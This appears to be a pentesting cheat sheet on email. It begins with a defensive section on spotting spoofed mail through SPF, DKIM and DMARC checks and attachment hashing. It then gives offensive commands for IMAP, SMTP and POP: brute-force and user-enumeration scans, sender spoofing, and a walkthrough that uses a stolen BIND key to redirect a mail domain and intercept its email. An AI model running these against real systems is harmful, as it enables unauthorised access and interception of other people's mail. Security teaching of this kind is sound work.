Email Analysis

Detecting malware from messages, check if they are phishing.

- [email-spoofing](https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/email-spoofing/)

OSINT

Email Source Analysis

We can see the email source in each provider or execute the following commands.

open example.xml
strings example.eml

Check the following headers to distinguish whether it is spoofed.

Authentication-Results

Each value in dkim, spf, dmarc should be pass. If not, the email may be spoofed.

Received

It should match the sender’s email address.

Received-SPF

Its value should be pass. If its value is faile, softfail, neutral or none, the email may be spoofed.

Others

Besides, check if the sender displayed name or address match From, Reply-To, Return-Path in headers. However, these header values can be modified by attackers so it could not be relied perfectly.

Check SPF, DKIM, DMARC Records of Domain

To confirm if these records exist in a domain, use dig command. If not exist, the domain may be spoofed, or may be categorized spam by some email providers. 

dig example.com txt

Also we can check that using online tools such as MxToolbox.

SPF Record

dig example.com txt

# output example:
example.com.  IN  TXT  "v=spf1 include:spf.example.com -all"
example.com.  IN  TXT  "v=spf1 +ip4:10.0.0.1/24 -all"
example.com.  IN  TXT  "v=spf1 a:mail.example.com -all"
example.com.  IN  TXT  "v=spf1 -all"
example.com.  IN  TXT  "v=spf1 mx -all"

Check DKIM Record

dig selector._domainkey.example.com txt

# output examples:
selector._domainkey.example.com  IN  TXT  k=rsa;p=J8eTBu224i086iK
selector._domainkey.example.com  IN  TXT  "selector._domainkey.example.com. 0  IN  TXT  "v=DKIM1; p=ABC...123;""

To check DKIM record, we need to specify the DKIM selector. It can be found in s= header value of dkim section in email header such as Authentication-Results. For example,

Authentication-Results: mx.google.com;
  dkim=pass header.i=@example.com header.s=s1234 header.b=ABCDEF123

In this case, we execute dig [s1234.example.com](http://s1234.example.com) txt .

Check DMARC Record

dig _dmarc.example.com txt

# output examples:
_dmarc.example.com.  IN  TXT  "v=DMARC1; p=reject; rua=mailto:mailauth-reports@example.com"

Be Careful of Fake Reply Message

If the email contains RE: (Regarding) which means replying your message, we need to check that it’s a really reply message. Attacker may impersonate reply message that victim communicated in the past.

Malware Detection in Attached Files

If you got email in which attached suspicious files, you need to investigate them.

  1. View the Message Source

  2. Copy the Attached File's Base64

  3. Change Base64 to SHA256

    sha256sum attached_file.doc
# or
echo -n 'abcde..==' > hash.txt
sha256sum hash.txt

    Or there are some useful tools:

  4. Investigate the Hash

    There are some useful tools:

IMAP (Internet Message Access Protocol) Pentesting

IMAP is an internet standard protocol used by email clients. Default ports are 143, 993.

Enumeration

nmap --script imap-capabilities -p 143 <target-ip>

nc -nv <target-ip> 143
openssl s_client -connect <IP>:993 -quiet

Connect

telnet 10.0.0.1 143

Commands

# Login
a1 login "<username>" "<password>"

# Logout
a1 logout

# Close mailbox
a1 close

SMTP (Simple Mail Transfer Protocol) Pentesting

It is used for sending e-mail. POP3 or IMAP are used for receiving e-mail. Default ports are 25 (SMTP), 465 (SMTPS), 587 (SMTPS).

Enumeration

nmap --script smtp-brute -p 25,465,587 <target-ip>
nmap --script smtp-commands -p 25,465,587 <target-ip>
nmap --script smtp-enum-users -p 25,465,587 <target-ip>
nmap --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=example.com -p 25,465,587 <target-ip>
nmap --script smtp-vuln-cve2011-1764 -p 25,465,587 <target-ip>
nmap --script smtp-* -p 25,465,587 <target-ip>

MX Domains

dig mx example.com

Users

# VRFY - check if the user exists in the SMTP server
smtp-user-enum -M VRFY -u <username> -t <target-ip>
smtp-user-enum -M VRFY -U usernames.txt -t <target-ip>

# RCPT - check if the user is allowed to receive mails in the SMTP server
smtp-user-enum -M RCPT -u <username> -t <target-ip>
smtp-user-enum -M RCPT -U usernames.txt -t <target-ip>

# EXPN - reveal the actual email address
smtp-user-enum -M EXPN -u <username> -t <target-ip>
smtp-user-enum -M EXPN -D <hostname> -U usernames.txt -t <target-ip>

STARTTLS

# port 25
openssl s_client -starttls smtp -connect <target-ip>:25
# Port 465
openssl s_client -crlf -connect <target-ip>:465
# Port 587
openssl s_client -starttls smtp -crlf -connect <target-ip>:587

Connect

nc <target-ip> 25
# or
telnet <target-ip> 25

Commands

Commands are not case sensitive.

EHLO - list all supported enhanced functions

ehlo example.com

Messages

# 1. check if the user exists
vrfy <username>
vrfy root

# 2. set the address of the mail sender
mail from: <username>
mail from: root
mail from: sender@example.com

# 3. set the address of the mail recipient
rcpt to: <username>
rcpt to: root
rcpt to: recipient@example.com

# 4. send data of message (the message end with ".")
data
subject: Test Mail
This is a test mail.
.

Others

# process remote queue
etrn example.com

# list the mailing list
expn example.com

Send Mails from External

swaks is a swiss army knife for SMTP.

swaks --to remote-user@example.com --from local-user@<local-ip> --server mail.example.com --body "hello"

Start SMTP Server

# -n: No setuid
# -c: Classname
sudo python3 -m smtpd -n -c DebuggingServer 10.0.0.1:25

Receive Email as Another Address

With misconfigurations of target system, we might be able to impersonate some email address then receive sensitive email.

Exploit DNS Zone Misconfiguration & BIND Config

If target host has the domain for email e.g. “mail.example.com” and we can get BIND secret key, we can update

1. Get BIND Secret Key

We need to get the BIND key in the config file.

# /etc/bind/named.conf

key "rndc-key" {
    algorithm hmac-sha256;
    secret "zBatC828gunRa...bA=";
};

2. Update DNS Zone

After retrieving the BIND secret, update DNS zone to add the new record for receiving email, with subdomain and our ip address.

# -d: Debug mode
# -y: Set the literal TSIG (Transaction Signature) authentication key.
nsupdate -d -y hmac-sha256:rndc-key:zBatC828gunRa...bA= 
Creating key...
namefromtext
keycreate
# Enter target domain
> server example.com
# Enter the new record
# 86400: The TTL (Time-To-Live) for the DNS record. Set 86400 seconds (24 hours) here.
# IN: Internet
# A: A record
# 10.0.0.1: Set your local ip address
> update add mail.example.com 86400 IN A 10.0.0.1
> send
Reply from SOA query:
...

3. Start SMTP Server

In local machine, start SMTP server for debugging when receiving email with “mail.example.com” from others.

# -n: No setuid
# -c: Classname
sudo python3 -m smtpd -n -c DebuggingServer 10.0.0.1:25

When receiving email, we should see the output in the terminal.

POP (Post Office Protocol) Pentesting

Post Office Protocol is an application-layer protocol used by email clients. POP3 is a commonly used version. Default ports are 110, 995.

Enumeration

nmap --script "pop3-capabilities or pop3-ntlm-info" -p 110 <target-ip>

Connect

nc <target-ip> 110
# or
telnet <target-ip> 110

Commands

# Login
USER <username>
PASS <password>

# Number and total size of all messages
STAT
# List messages and size
LIST
# Retrieve the message of given number
RETR <number>
# Delete the message of given number
DELE <number>
# Reset the mailbox
RSET
# Exit the mail server
QUIT